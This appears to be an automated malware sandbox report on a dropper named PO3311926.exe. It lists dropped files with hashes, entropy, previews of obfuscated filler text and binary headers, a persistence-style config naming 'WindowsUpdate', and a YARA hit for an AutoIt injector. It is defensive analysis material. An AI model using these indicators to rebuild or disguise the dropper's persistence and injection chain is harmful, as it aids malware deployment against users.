                                                                                            Preview:06jR3FHUq0ha50H7X5rqrq943fM4..387F3s5nv2IvFY533eZ6p47G3NGs38hu453245159I3mT1vm4N9Xkw6s7..rCHZB3W0757p2D56314X472p019cU6LZhi1HmP5..13JY4pAZtKA6mArLN8NTU479wHOdVa809..Xp09779xz9038wr179CVMNfQ23dbx0LOC52ykY1I309205nR34W2F..31S8rp61NVtS852pm428H97p6J86Q45Ejc8fLhcMx89E0Du09031PMQ22406ERYcn..6N3683216RuA8ue5967Pm59jdWac4Xu6W8g..HKKV0X045hby79EXq834oRdPr1od1e43164c70O33y4Dq20u8n9L129ezS8o29589Y22Y8..1472759q6543QM7gC6T32Q549HqT14m3147Re8Ff5S..zgQgKF8I8Q1vl3f5592B0473q73ZCE795..502E19thKh201815G31N261oA29HddN6kd26oMMN6oFf53qZ9K5EnexkJiVx6..HB5RD692U6559v4Mu8300Dk1FWyME0634n1S5Abp71XxFwYr..4KIf8rA3I06M5F06P7CZ0z4QA75mw4P3J57u7072G1nDeV806vRON70266w2W2Fl2..6L43Z332n36262UxX06O9Z6n9w2aHo3..89FSyxU36340H424n7f103FdMq616X8183n5x871L63D2IABd5Y7WT4aMHI4992341jKR9A70Q33d94o5A25P23w80C14..e8N1ihW2P25dQE085a7DXs747krVQ4V2JI26ex528c06J94dM573248Y5jIfrYA..8622946Fa5783t58p6g9b19uuJE8JJFC24j7ajBUZDt34eGkSs1D972lDt9p6T4..5aB1A6yLSf5BGvKXWBwgJy1MSOqa35O6hcKkK756..42i56q51wa7Df0Ijg97220a65J6z03K..m72k927kD206
                                                                                            Process:C:\Users\user\Desktop\PO3311926.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):549
                                                                                            Entropy (8bit):5.451056001588005
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:FLe25+BNcOeLkrKy3SiwMHl2s8vo9SY+BPmcLNM:FabcOSGKy3S1MHl2dvGSxBM
                                                                                            MD5:2098AB9B09F8EF8FDBAE1367325F06CC
                                                                                            SHA1:878A8A4F2DCD3CD912BC00463B539E3ADB48CAB7
                                                                                            SHA-256:016B23334F8AE86DF09D213E43C5F35C049EB7547098804E602F622EF8CD40D7
                                                                                            SHA-512:D4240BF7E709E3A5C95939FD3856FA04E2E35E1BEFDE4EE1C48102DA1208C07ABC08DFD08FC0CC7A6FE7D7D0AD5101171A92857A8182E5CD5EBEFEBA96D288A2
                                                                                            Malicious:false
                                                                                            Preview:mXks05Af07055jf305e7892HK8dKhepY26Yts80129m17o32843r51h686X31CpxYAUz71miu9Y933547322H1..ToolTipConstants GuiDateTimePicker..H1D06b72CG3o9DXDR56..ToolbarConstants UpDownConstants..Z95P8fzY4648mR04693B4F6Nl61Mi7Ax30F62VEG7i03NuCC35PN01J57472jbr265w..ColorConstants ComboConstants..dJfbCN1G6566..StructureConstants ToolbarConstants..1NUAeV329P9lEKk6sVKh83AX6soVS15o3f646d8wub22671dQYkSSBW7494ut1a42ukf5j..ToolTipConstants TreeViewConstants..0w8B07LDb6R5C00L9P937rkZ9x45wdh869c82833io0Bu1782x4V10963aX17R882u6Af580V63heC..ColorConstants ComboConstants..
                                                                                            Process:C:\Users\user\Desktop\PO3311926.exe
                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):71001
                                                                                            Entropy (8bit):3.7357586345067477
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:e7sXNaRjSktuowGPaZB8solGHYAfBPkh3DdfUl+m:wjeuhxo
                                                                                            MD5:B71D8744631044A291DB10AC6A953946
                                                                                            SHA1:B840F5047D6706B1A552963A25F0CC09F11DEAD9
                                                                                            SHA-256:CC5EEBA6859999452AD8FCB224D6B75B127721B26A07EFB640A81015A674E1F7
                                                                                            SHA-512:1D4599F27557ADE4D233E694026373F72A149C9C84C23E70EC3246AED2FEB2B345FF8BC3EB0DBE8536D03F9F8C5B4F9AC147B1595CDB89AE53F870FEDA5DA074
                                                                                            Malicious:false
                                                                                            Preview:0x4D5*9]]3]]]04]]]FFFF]]_8]]]]]]]4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]08]]]]E/F_*0E]_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0*24]]]]]]]5045]]4C0/03]ED642*66]]]]]]]]E]]20/0_0/0_]]9*]]]08]]]]]]FE_7]]]2]]]0C]]]]04]]02]]]]2]]04]]]]]]]04]]]]]]]]]0/]]02]]]]]]02]4085]]/]]0/]]]]0/]]0/]]]]]]0/]]]]]]]]]]]0*8_7]]53]]]]C]]0E]4]]]]]]]]]]]]]]]]]]]E]]]C]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]2]]]8]]]]]]]]]]]082]]048]]]]]]]]]]]2E74657874]]]0498]]]2]]]09*]]]02]]]]]]]]]]]]]]2]]0602E72737263]]]E]4]]]C]]]]6]]]9C]]]]]]]]]]]]]]4]]0402E72656C6F63]]0C]]]]E]]]]2]]]*2]]]]]]]]]]]]]]4]]042]]]]]]]]]]]]]]]]E0_7]]]]]]48]]]02]05]_C7/]]EC45]]0/]]]/4]]06]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]/E02280/]]0*2*/E022804]]0*2**67306]]0*8]/]]047307]]0*8]2]]047308]]0*8]3]]047309]]0*8]4]]042*]]/33]/]0F]]]0/]]//7E0/]]046F0*]]0*0*2_]062*]/33]/]0F]]]02]]//7E02]]046F0_]]0*0*2_]062*]/33]/]0F]]]03]]//7E03]]046F0C]]0*0*2_]062*]/33]/]0F]]]04]]//7E04]]046F0D]
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Apr 29 08:36:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):2677
                                                                                            Entropy (8bit):3.9787797233856486
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:8v0dHTf/GH+idAKZdA1oehwiZUklqehgy+3:8vAje3y
                                                                                            MD5:A97C8268289D5B3A103996D91585D450
                                                                                            SHA1:5482567B1F993A78A185900E730128972FA1D9D5
                                                                                            SHA-256:546AFC762FA6D047CD8CF618905223F775F6AFD64C886A083AC9C94F686DB56A
                                                                                            SHA-512:FCEB71A6C878DC1E6408AEF569EA80B2DA5691993CCBF0676E6D306D7025FA0EF115811D05BDAB148608C8CFFEBFED05661B8D8AFF852CD4EA49F30194DC040D
                                                                                            Malicious:false
                                                                                            Preview:L..................F.@.. ...$+.,....j......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.X.L....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............n.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Apr 29 08:36:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):2679
                                                                                            Entropy (8bit):3.995710336924251
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:8g0dHTf/GH+idAKZdA1leh/iZUkAQkqehny+2:8gAjc9QKy
                                                                                            MD5:110EB60959FB6A13E9993D494B045966
                                                                                            SHA1:774E4DB10AF4150BBF3784B144793083BBF389A0
                                                                                            SHA-256:F296D5D44B01B8258AF8D0C165CA7777A0D504BCE34E3594CEBC4EF6867DF07A
                                                                                            SHA-512:8CAFFFA4A9821CAD45D5AFCF1B679E2BBB4AAD2B1BF81E7D26C7D929BD3576637C9361F70B2EF7073A5C5FCE02A0C014D914D561BAB84A1C23D303A56BA66C2F
                                                                                            Malicious:false
                                                                                            Preview:L..................F.@.. ...$+.,....e......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.X.L....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............n.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:00:51 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):2693
                                                                                            Entropy (8bit):4.006044622396717
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:820dHTf/bH+idAKZdA14t5eh7sFiZUkmgqeh7sBy+BX:82Ajznzy
                                                                                            MD5:0DE1D4E28354346DC77C65FCE1B5DF6A
                                                                                            SHA1:00FF27F91D05428628F4FECE773FB6D36CEA0C45
                                                                                            SHA-256:266EBB2A0C8F1D6399216D32F03FF7CC0E3B1FA31E6DCE88EAFDEA34255694C5
                                                                                            SHA-512:A4FBCAC313AC3E6018045A2EA409B1AAD4234F9EFB418461EFCA2410ED79DA7054D1882423F0B5598C43ACC11B5831D978E3F877F45EBF1DF3B62B03FF1403D8
                                                                                            Malicious:false
                                                                                            Preview:L..................F.@.. ...$+.,.....C..b...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.X.L....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VEW.@...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............n.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Apr 29 08:36:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):2681
                                                                                            Entropy (8bit):3.9943443763286113
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:8Q0dHTf/GH+idAKZdA16ehDiZUkwqehby+R:8QAj3py
                                                                                            MD5:75C58D944170F8BA21CD6EDAC1FE52A3
                                                                                            SHA1:CF4BAFEA16A11521E0E00EDC538E6AD33B094D79
                                                                                            SHA-256:40A3A60235C0BEC2D1C1061FAE31073B912194101B18911C5DF775D11C5B8C2C
                                                                                            SHA-512:BF0AABD11351C8D6E97841A475B9EFA87693E4592713804040FBE702EC245BD3BA213E822115A65CF172A503FB99573FAD17BBE201E3E4331DA8054468B1CA76
                                                                                            Malicious:false
                                                                                            Preview:L..................F.@.. ...$+.,....vE.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.X.L....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............n.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Apr 29 08:36:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):2681
                                                                                            Entropy (8bit):3.981044695446285
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:8w0dHTf/GH+idAKZdA1UehBiZUk1W1qehty+C:8wAjn9Ny
                                                                                            MD5:ECE7014EB8AAD876FA67B69B659B2DF3
                                                                                            SHA1:04191585C41959B414C7EB563476EF001DC1ED78
                                                                                            SHA-256:CE74F86BB000904D5DFDC2F9374F7928F80BD478579374BF45F903075D1B9846
                                                                                            SHA-512:6E3A0E0D31C891076B4AC65E5783EAB3A98446F72B250D75F5073BD4F571C217B28B220465F62B1262F1C35451A8E9F1DE72DD5BDC61DA47F0874BCB5F875D84
                                                                                            Malicious:false
                                                                                            Preview:L..................F.@.. ...$+.,....cs.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.X.L....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............n.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Apr 29 08:36:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):2683
                                                                                            Entropy (8bit):3.9959969454489226
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:8w0dHTf/GH+idAKZdA1duTrehOuTbbiZUk5OjqehOuTbzy+yT+:8wAjwTYTbxWOvTbzy7T
                                                                                            MD5:16892E71F4614771AF81D5322818FD88
                                                                                            SHA1:60E6241236D4428DE76F9CFD7B0B1160F71063AB
                                                                                            SHA-256:A1B5DD5DA0C5590DC4C61EFFC4AF3602B399E40FE3B81A90F05DCF3D45D64AB8
                                                                                            SHA-512:A195B5C8059C99D3D5F09EE400F89FF4390EF7D75CA1F5CA32C308569C59FD3572810B422A9AB676ACF184AFC85F38A509BCBCF8CA1E7678A1B8F2538CEED139
                                                                                            Malicious:false
                                                                                            Preview:L..................F.@.. ...$+.,...........N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.X.L....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............n.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                            File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):45984
                                                                                            Entropy (8bit):6.16795797263964
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                                                                            MD5:9D352BC46709F0CB5EC974633A0C3C94
                                                                                            SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                                                                            SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                                                                            SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):89
                                                                                            Entropy (8bit):4.880158225201859
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:YRRvuf1lXhONvkY9JlC9hRGdYkI4iz7NLHKovn:AvgDO9kcoGpIZJzzv
                                                                                            MD5:C770990E69B3887C7FFEB4D2E6897E99
                                                                                            SHA1:9584FD23A5694548D6D678A98044441AB2EF4EB1
                                                                                            SHA-256:B2C49B81F942B5215952235E1B2C60CEDD4D48CAFEC061312C0B38294FD5BD01
                                                                                            SHA-512:7C0B930BDADBB634A8D93F4DF4BE7A562EAEAF850539097E15A2FB499D199CCB775562930A20092976DFAD56BC6F38BC81A780CD01A4592981173F624A99003A
                                                                                            Malicious:false
                                                                                            Preview:[S3tt!ng]..stpths=%userprofile%..Key=WindowsUpdate..Dir3ctory=wrse..ExE_c=sdadbtvsh.bin..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):520
                                                                                            Entropy (8bit):5.499830456903425
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:ZvPW4AywqRWqrOGaUWPcjKGU7WufGk3BPydz7mVMmOl:ZvO4AyPWgOGbKLSufGk3QZ7Hm+
                                                                                            MD5:9C20E4DBC8B06339684813411E0EBAE9
                                                                                            SHA1:33576982CF29C18EF4E32A0B7E75981FD420656C
                                                                                            SHA-256:6FEF2EE6CEABF623D208AEE66EE8A97FB381C0542106E0573E5F35FF15F929AE
                                                                                            SHA-512:30559525DB0A8DA52AE117169C82FA6A81FCF1320207F04EB8090AC4D84C62630A1A1E81880A13BDA998F898A9E15C107E855CC8FA3FB0741D82570A01199F8C
                                                                                            Malicious:false
                                                                                            Preview:fxL2sfn147y8n3k8pvwl854e36W8v2ymc6t4N41K5I8f1..DateTimeConstants StructureConstants..FbMU7GFuNIP2U57uJEe4520GywIF9687371Lu7k44Fru36Lw2F..StructureConstants ToolTipConstants..g555Ux8yN4097E1vp8BjX5N42287268rwJhn2WW8ih6WxUFbX4556d79g67JvW4664307712X39uz12VC226vNQp285s3Zo6924g6JdlhCdiFGbd40L894B9684F60A69756u3532503M2A4pE..ColorConstants TreeViewConstants..9Fg529a..FileConstants FileConstants..upb868026PTA92850z5y458PPt0lnWW9Zb52b2975Iv6xLVX8S0i1Q9c5h8L5v87oF9919y37Us5T36j231rdStq4z4Q..UpDownConstants ColorConstants..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):578
                                                                                            Entropy (8bit):5.470929431536943
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:QmrVWRQ13GEhjNiTP9RAHcNDJMT5WUzMTdWNe/jeubmnB9u:Q4WRQ13GEBNijicNDJS7cdWYLeuC2
                                                                                            MD5:6E0C9DF3739A1E85F2F4D0A7F9EB2CCB
                                                                                            SHA1:662EB231AD68AC60CD49BFE70001693511F605FD
                                                                                            SHA-256:305E8EF070FF770300A914B1CF5B1496966DF70189471F538BDC88FD6956204D
                                                                                            SHA-512:8466D8335765CD7EE5189CA90BF3FD820CBFA2CDF1041370200A5C7C8F7856540798C7B83AE44299AD517DC83B79AABBEA172A90346D15EB9FC09449F6A3E16E
                                                                                            Malicious:false
                                                                                            Preview:32CK95RY0814hv941T7k4iDeF..FontConstants FileConstants..64V81Fy4y81413I3L5VD9Z8R281FOL93245K2w699i15A8VJWP729qU14121O4..TreeViewConstants StructureConstants..8l8b835bP14P09H5586985r91iv96zgie11ein93l52223N3A1lN4l3HDO7R2waLs23lWD1I079aL0aWAL45ir06838uk4o72K80RNN3Q6n6o30..BorderConstants FileConstants..967jjg6Z7NxnB8Of2244549aCW1751Z9wPl4C03955N9AhB9mTUPta6KYZKo8Y2886c851T78016928X3a749n2xdYL72m3gMim4cH6c243Ptx683g30o8HeHc613y0FV..BorderConstants GuiDateTimePicker..B659447925ju61F0nsx470ry35T8CAmK3UTd9Ot6H9ce5xcFF1W246k7025595g4c6i2t572Qc6..BorderConstants ButtonConstants..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):507
                                                                                            Entropy (8bit):5.563974152435707
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:lXVPiyMsfK8BPpSX2Qny/RHw64FaERiBoeUQXn8:HXi8va9nzla4iBNR8
                                                                                            MD5:4780805307EC0CCA7AB5C03C0FE32B6A
                                                                                            SHA1:CCBF8B62C820CA937CC16D2C9ED96284086F9DE6
                                                                                            SHA-256:3CD1C08B7401ECA53AC3DEEDFC1102D9FF1AE21B028CA7E588CD20DDBD3EB447
                                                                                            SHA-512:E1F016BF6DFD31579F98E007E6BBAD9D4552478D7A9CD99521E534C2A21BD4590263CA57E6DF1C65F958C7448B2F9D8C877AE9970FCB9CDD596FCD2F0BA06997
                                                                                            Malicious:false
                                                                                            Preview:7x4i39U1577T9c980g98v9S3m9846B290uk70Y163393RDZ4IQj1967w3LIH7b9011w561jM..FontConstants TreeViewConstants..4q4SrH1896X8r978v8J7r4jcLvGv556A7Vo8Vr3104cLVF1c074auW8o3z708Dsa490A5Qm0408ka30ey6x72zU58nyx8qF1233Cn5bp7wnq16g..StructureConstants FileConstants..5W91U6etd85cO1O75kq2opx91R3Nv45FN6HUF658652R4LUwn6zILeh6P75644mMAs8u091wcTk195618FKJ70Zg36H140MIhR..ButtonConstants UpDownConstants..VP3OmSU4GdSB863C9h6U54W285384k1GQ64b5Z8R0Kh273R7O6L1WF9Zn112FcUE7Y0d3m14gl11aT928jJ..ToolTipConstants ToolTipConstants..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):77764244
                                                                                            Entropy (8bit):6.953358239636248
                                                                                            Encrypted:false
                                                                                            SSDEEP:98304:d3WyIsyX65fO/lWSP3c88U8OFoLI/D/S5E4xZ6x23CXOx5SVUkpS+8+a+QM9JHcN:T
                                                                                            MD5:9ED200FBFBB5AD31F672F02841A6A5F0
                                                                                            SHA1:B13CBC45CA0043F0D7B3404AEEFCC0F486578B99
                                                                                            SHA-256:18DBA9188C29CB03FA1C641C96E92083D2D678A71A69C506692DFB7DFCB85058
                                                                                            SHA-512:9599F7D024D507A7D88A5B9A4899EEAC3BE78E257EC86591B3FF8D588826C80C35D7C874078EC19489EA1EAC440538483E655777B3E6D540543A72741EE7E416
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_AutoitInjector, Description: Yara detected Autoit Injector, Source: C:\Users\user\wrse\nngqrvwq.xl, Author: Joe Security
